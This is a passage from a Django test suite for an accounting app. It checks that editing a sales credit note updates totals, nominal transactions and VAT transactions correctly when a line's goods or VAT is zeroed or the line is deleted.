line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2520
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2520
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
21 + 21 + 21
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
21
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
21
)
vat_transactions = list(vat_transactions)
lines = list(lines)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for tran in goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
for tran in vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
for tran in total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Based on above
# Except this time we reduce goods to zero on a line
# This should delete the corresponding nominal transaction for goods
# And obviously change the control account nominal value
def test_goods_reduced_to_zero_but_vat_non_zero_on_a_line(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": -1 * header.total - 100 # we set goods = 0 when previously was 100
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms[-1]["goods"] = 0
line_forms[-1]["vat"] = 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2300
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2300
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
19 + 20 + 20
# 19 goods nominal transactions
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
unedited_lines = list(lines)[:-1]
for i, line in enumerate(unedited_lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
i = i + 1
edited_line = lines[-1]
self.assertEqual(edited_line.header, header)
self.assertEqual(edited_line.line_no, i + 1)
self.assertEqual(edited_line.description, self.description)
self.assertEqual(edited_line.goods, 0)
self.assertEqual(edited_line.nominal, self.nominal)
self.assertEqual(edited_line.vat_code, self.vat_code)
self.assertEqual(edited_line.vat, -20)
# NOMINAL TRANSACTION FOR GOODS IS REMOVED
self.assertEqual(
edited_line.goods_nominal_transaction,
None
)
self.assertEqual(
edited_line.vat_nominal_transaction,
nom_trans[ 57 ]
)
self.assertEqual(
edited_line.total_nominal_transaction,
nom_trans[ 58 ]
)
self.assertEqual(
edited_line.vat_transaction,
vat_transactions[-1]
)
goods_nom_trans = nom_trans[:-2:3]
vat_nom_trans = nom_trans[1:-2:3]
total_nom_trans = nom_trans[2:-2:3]
unedited_goods_nom_trans = goods_nom_trans
# CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
for tran in unedited_goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
unedited_vat_nom_trans = vat_nom_trans
for tran in unedited_vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
unedited_total_nom_trans = total_nom_trans
for tran in unedited_total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
edited_vat_nom_tran = nom_trans[-2]
self.assertEqual(
edited_vat_nom_tran.value,
20
)
self.assertEqual(
edited_vat_nom_tran.nominal,
self.vat_nominal
)
self.assertEqual(
edited_vat_nom_tran.field,
"v"
)
edited_total_nom_tran = nom_trans[-1]
self.assertEqual(
edited_total_nom_tran.value,
-20
)
self.assertEqual(
edited_total_nom_tran.nominal,
self.sale_control
)
self.assertEqual(
edited_total_nom_tran.field,
"t"
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Same as above except we now blank out vat and not goods
    def test_vat_reduced_to_zero_but_goods_non_zero_on_a_line(self):
        """
        Mirror image of the goods-zeroed test above: edit a posted credit
        note of 20 identical lines (goods 100, vat 20 each) so the LAST
        line keeps goods = 100 but has its vat reduced from 20 to 0.

        Expected outcome: the vat nominal transaction for that line is
        deleted (field becomes None), its total nominal transaction drops
        to -100, the header total/due fall by 20 (to -2380), and all
        other lines, nominal transactions and vat transactions are
        untouched.
        """
        self.client.force_login(self.user)
        # Post a credit note with 20 identical lines and matching nominal entries
        create_credit_note_with_nom_entries(
            {
                "type": "sc",
                "customer": self.customer,
                "period": self.period,
                "ref": self.ref,
                "date": self.model_date,
                "due_date": self.model_due_date,
                "total": 2400,
                "paid": 0,
                "due": 2400,
                "goods": 2000,
                "vat": 400
            },
            [
                {
                    'description': self.description,
                    'goods': 100,
                    'nominal': self.nominal,
                    'vat_code': self.vat_code,
                    'vat': 20
                }
            ] * 20,
            self.vat_nominal,
            self.sale_control
        )
        headers = SaleHeader.objects.all().order_by("pk")
        lines = SaleLine.objects.all().order_by("pk")
        self.assertEqual(
            len(lines),
            20
        )
        create_vat_transactions(headers[0], lines)
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            20
        )
        self.assertEqual(
            len(headers),
            1
        )
        self.assertEqual(
            headers[0].total,
            -2400
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            -2400
        )
        nom_trans = NominalTransaction.objects.all()
        self.assertEqual(
            len(nom_trans),
            20 + 20 + 20
        )
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        header = headers[0]
        # Pre-edit sanity checks: every vat transaction mirrors its line
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
        # Each line points at its three nominal transactions (g, v, t triplets)
        for i, line in enumerate(lines):
            self.assertEqual(line.header, header)
            self.assertEqual(line.line_no, i + 1)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        goods_nom_trans = nom_trans[::3]
        vat_nom_trans = nom_trans[1::3]
        total_nom_trans = nom_trans[2::3]
        for i, tran in enumerate(goods_nom_trans):
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
            self.assertEqual(
                lines[i].goods_nominal_transaction,
                tran
            )
        for i, tran in enumerate(vat_nom_trans):
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
            self.assertEqual(
                lines[i].vat_nominal_transaction,
                tran
            )
        for i, tran in enumerate(total_nom_trans):
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
            self.assertEqual(
                lines[i].total_nominal_transaction,
                tran
            )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Build the edit form: last line keeps goods 100 but vat becomes 0
        data = {}
        header_data = create_header(
            HEADER_FORM_PREFIX,
            {
                "type": header.type,
                "customer": header.customer.pk,
                "period": header.period.pk,
                "ref": header.ref,
                "date": header.date.strftime(DATE_INPUT_FORMAT),
                "due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
                "total": -1 * header.total - 20 # we set vat = 0 when previously was 20
            }
        )
        data.update(header_data)
        lines_as_dicts = [ to_dict(line) for line in lines ]
        line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
        line_forms = line_trans
        for form in line_forms:
            form["goods"] *= -1
            form["vat"] *= -1
        line_forms[-1]["goods"] = 100
        line_forms[-1]["vat"] = 0
        line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
        line_data["line-INITIAL_FORMS"] = 20
        data.update(line_data)
        matching_data = create_formset_data(match_form_prefix, [])
        data.update(matching_data)
        url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
        response = self.client.post(url, data)
        # Post-edit checks: header totals fall by the removed vat of 20
        headers = SaleHeader.objects.all()
        self.assertEqual(len(headers), 1)
        self.assertEqual(
            headers[0].total,
            -2380
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            -2380
        )
        nom_trans = NominalTransaction.objects.all()
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        self.assertEqual(
            len(nom_trans),
            20 + 19 + 20
            # 20 goods, 19 vat, 20 total -- the edited line's vat nominal transaction was deleted
        )
        header = headers[0]
        lines = (
            SaleLine.objects
            .select_related("vat_code")
            .all()
            .order_by("pk")
        )
        self.assertEqual(
            len(lines),
            20
        )
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            20
        )
        vat_transactions = list(vat_transactions)
        lines = list(lines)
        unedited_lines = list(lines)[:-1]
        for i, line in enumerate(unedited_lines):
            self.assertEqual(line.header, header)
            self.assertEqual(line.line_no, i + 1)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        i = i + 1
        edited_line = lines[-1]
        self.assertEqual(edited_line.header, header)
        self.assertEqual(edited_line.line_no, i + 1)
        self.assertEqual(edited_line.description, self.description)
        self.assertEqual(edited_line.goods, -100)
        self.assertEqual(edited_line.nominal, self.nominal)
        self.assertEqual(edited_line.vat_code, self.vat_code)
        self.assertEqual(edited_line.vat, 0)
        # NOMINAL TRANSACTION FOR VAT IS REMOVED (goods one is kept)
        self.assertEqual(
            edited_line.goods_nominal_transaction,
            nom_trans[ 57 ]
        )
        self.assertEqual(
            edited_line.vat_nominal_transaction,
            None
        )
        self.assertEqual(
            edited_line.total_nominal_transaction,
            nom_trans[ 58 ]
        )
        self.assertEqual(
            edited_line.vat_transaction,
            vat_transactions[-1]
        )
        goods_nom_trans = nom_trans[:-2:3]
        vat_nom_trans = nom_trans[1:-2:3]
        total_nom_trans = nom_trans[2:-2:3]
        unedited_goods_nom_trans = goods_nom_trans
        # CHECK OUR UNEDITED FIRST ARE INDEED UNEDITED
        for tran in unedited_goods_nom_trans:
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
        unedited_vat_nom_trans = vat_nom_trans
        for tran in unedited_vat_nom_trans:
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
        unedited_total_nom_trans = total_nom_trans
        for tran in unedited_total_nom_trans:
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
        # NOW CHECK THE EDITED
        edited_goods_nom_tran = nom_trans[-2]
        self.assertEqual(
            edited_goods_nom_tran.value,
            100
        )
        self.assertEqual(
            edited_goods_nom_tran.nominal,
            self.nominal
        )
        self.assertEqual(
            edited_goods_nom_tran.field,
            "g"
        )
        edited_total_nom_tran = nom_trans[-1]
        self.assertEqual(
            edited_total_nom_tran.value,
            -100
        )
        self.assertEqual(
            edited_total_nom_tran.nominal,
            self.sale_control
        )
        self.assertEqual(
            edited_total_nom_tran.field,
            "t"
        )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Double entry must still balance to zero across all nominal transactions
        total = 0
        for tran in nom_trans:
            total = total + tran.value
        self.assertEqual(
            total,
            0
        )
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
# CORRECT USAGE
# Zero out the goods and the vat
# We expect the line and the three nominal transactions to all be deleted
    def test_goods_and_vat_for_line_reduced_to_zero(self):
        """
        Attempt to edit a posted credit note so that the last line has
        BOTH goods and vat set to zero.

        This is rejected by form validation: the response is a 200
        re-render containing the "Goods and Vat cannot both be zero."
        error, and nothing in the database changes.
        """
        self.client.force_login(self.user)
        # Post a credit note with 20 identical lines and matching nominal entries
        create_credit_note_with_nom_entries(
            {
                "type": "sc",
                "customer": self.customer,
                "period": self.period,
                "ref": self.ref,
                "date": self.model_date,
                "due_date": self.model_due_date,
                "total": 2400,
                "paid": 0,
                "due": 2400,
                "goods": 2000,
                "vat": 400
            },
            [
                {
                    'description': self.description,
                    'goods': 100,
                    'nominal': self.nominal,
                    'vat_code': self.vat_code,
                    'vat': 20
                }
            ] * 20,
            self.vat_nominal,
            self.sale_control
        )
        headers = SaleHeader.objects.all().order_by("pk")
        lines = SaleLine.objects.all().order_by("pk")
        self.assertEqual(
            len(lines),
            20
        )
        create_vat_transactions(headers[0], lines)
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            20
        )
        self.assertEqual(
            len(headers),
            1
        )
        self.assertEqual(
            headers[0].total,
            -2400
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
            -2400
        )
        nom_trans = NominalTransaction.objects.all()
        self.assertEqual(
            len(nom_trans),
            20 + 20 + 20
        )
        nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
        header = headers[0]
        # Pre-edit sanity checks: every vat transaction mirrors its line
        for i, vat_tran in enumerate(vat_transactions):
            self.assertEqual(
                vat_tran.header,
                header.pk
            )
            self.assertEqual(
                vat_tran.line,
                lines[i].pk
            )
            self.assertEqual(
                vat_tran.module,
                "SL"
            )
            self.assertEqual(
                vat_tran.ref,
                header.ref
            )
            self.assertEqual(
                vat_tran.period,
                header.period
            )
            self.assertEqual(
                vat_tran.date,
                header.date
            )
            self.assertEqual(
                vat_tran.field,
                "v"
            )
            self.assertEqual(
                vat_tran.tran_type,
                header.type
            )
            self.assertEqual(
                vat_tran.vat_type,
                "o"
            )
            self.assertEqual(
                vat_tran.vat_code,
                lines[i].vat_code
            )
            self.assertEqual(
                vat_tran.vat_rate,
                lines[i].vat_code.rate
            )
            self.assertEqual(
                vat_tran.goods,
                lines[i].goods
            )
            self.assertEqual(
                vat_tran.vat,
                lines[i].vat
            )
        self.assertEqual(
            header.goods,
            sum(vat_tran.goods for vat_tran in vat_transactions)
        )
        self.assertEqual(
            header.vat,
            sum(vat_tran.vat for vat_tran in vat_transactions)
        )
        # Each line points at its three nominal transactions (g, v, t triplets)
        for i, line in enumerate(lines):
            self.assertEqual(line.header, header)
            self.assertEqual(line.line_no, i + 1)
            self.assertEqual(line.description, self.description)
            self.assertEqual(line.goods, -100)
            self.assertEqual(line.nominal, self.nominal)
            self.assertEqual(line.vat_code, self.vat_code)
            self.assertEqual(line.vat, -20)
            self.assertEqual(
                line.goods_nominal_transaction,
                nom_trans[ 3 * i ]
            )
            self.assertEqual(
                line.vat_nominal_transaction,
                nom_trans[ (3 * i) + 1 ]
            )
            self.assertEqual(
                line.total_nominal_transaction,
                nom_trans[ (3 * i) + 2 ]
            )
            self.assertEqual(
                line.vat_transaction,
                vat_transactions[i]
            )
        goods_nom_trans = nom_trans[::3]
        vat_nom_trans = nom_trans[1::3]
        total_nom_trans = nom_trans[2::3]
        for i, tran in enumerate(goods_nom_trans):
            self.assertEqual(
                tran.value,
                100
            )
            self.assertEqual(
                tran.nominal,
                self.nominal
            )
            self.assertEqual(
                tran.field,
                "g"
            )
            self.assertEqual(
                lines[i].goods_nominal_transaction,
                tran
            )
        for i, tran in enumerate(vat_nom_trans):
            self.assertEqual(
                tran.value,
                20
            )
            self.assertEqual(
                tran.nominal,
                self.vat_nominal
            )
            self.assertEqual(
                tran.field,
                "v"
            )
            self.assertEqual(
                lines[i].vat_nominal_transaction,
                tran
            )
        for i, tran in enumerate(total_nom_trans):
            self.assertEqual(
                tran.value,
                -120
            )
            self.assertEqual(
                tran.nominal,
                self.sale_control
            )
            self.assertEqual(
                tran.field,
                "t"
            )
            self.assertEqual(
                lines[i].total_nominal_transaction,
                tran
            )
        matches = SaleMatching.objects.all()
        self.assertEqual(
            len(matches),
            0
        )
        # Build the edit form: last line has both goods and vat zeroed out
        data = {}
        header_data = create_header(
            HEADER_FORM_PREFIX,
            {
                "type": header.type,
                "customer": header.customer.pk,
                "period": header.period.pk,
                "ref": header.ref,
                "date": header.date.strftime(DATE_INPUT_FORMAT),
                "due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
                "total": -1 * header.total - 120 # we zero out both goods (100) and vat (20) on the last line
            }
        )
        data.update(header_data)
        lines_as_dicts = [ to_dict(line) for line in lines ]
        line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
        line_forms = line_trans
        for form in line_forms:
            form["goods"] *= -1
            form["vat"] *= -1
        line_forms[-1]["goods"] = 0
        line_forms[-1]["vat"] = 0
        line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
        line_data["line-INITIAL_FORMS"] = 20
        data.update(line_data)
        matching_data = create_formset_data(match_form_prefix, [])
        data.update(matching_data)
        url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
        response = self.client.post(url, data)
        # The form is invalid so the page re-renders with the error message
        self.assertEqual(
            response.status_code,
            200
        )
        self.assertContains(
            response,
            '<li class="py-1">Goods and Vat cannot both be zero.</li>',
            html=True
        )
# CORRECT USAGE
# SIMPLY MARK A LINE AS DELETED
    def test_line_marked_as_deleted_has_line_and_nominals_removed(self):
        """
        Edit a posted credit note of 20 identical lines (goods 100,
        vat 20 each) and mark the last line's formset form as DELETE.

        Expected outcome: the line and all three of its nominal
        transactions (goods, vat, total) plus its vat transaction are
        removed, leaving 19 of each, and the header totals fall by 120
        (to -2280).
        """
        self.client.force_login(self.user)
        # Post a credit note with 20 identical lines and matching nominal entries
        create_credit_note_with_nom_entries(
            {
                "type": "sc",
                "customer": self.customer,
                "period": self.period,
                "ref": self.ref,
                "date": self.model_date,
                "due_date": self.model_due_date,
                "total": 2400,
                "paid": 0,
                "due": 2400,
                "goods": 2000,
                "vat": 400
            },
            [
                {
                    'description': self.description,
                    'goods': 100,
                    'nominal': self.nominal,
                    'vat_code': self.vat_code,
                    'vat': 20
                }
            ] * 20,
            self.vat_nominal,
            self.sale_control
        )
        headers = SaleHeader.objects.all().order_by("pk")
        lines = SaleLine.objects.all().order_by("pk")
        self.assertEqual(
            len(lines),
            20
        )
        create_vat_transactions(headers[0], lines)
        vat_transactions = VatTransaction.objects.all().order_by("line")
        self.assertEqual(
            len(vat_transactions),
            20
        )
        self.assertEqual(
            len(headers),
            1
        )
        self.assertEqual(
            headers[0].total,
            -2400
        )
        self.assertEqual(
            headers[0].paid,
            0
        )
        self.assertEqual(
            headers[0].due,
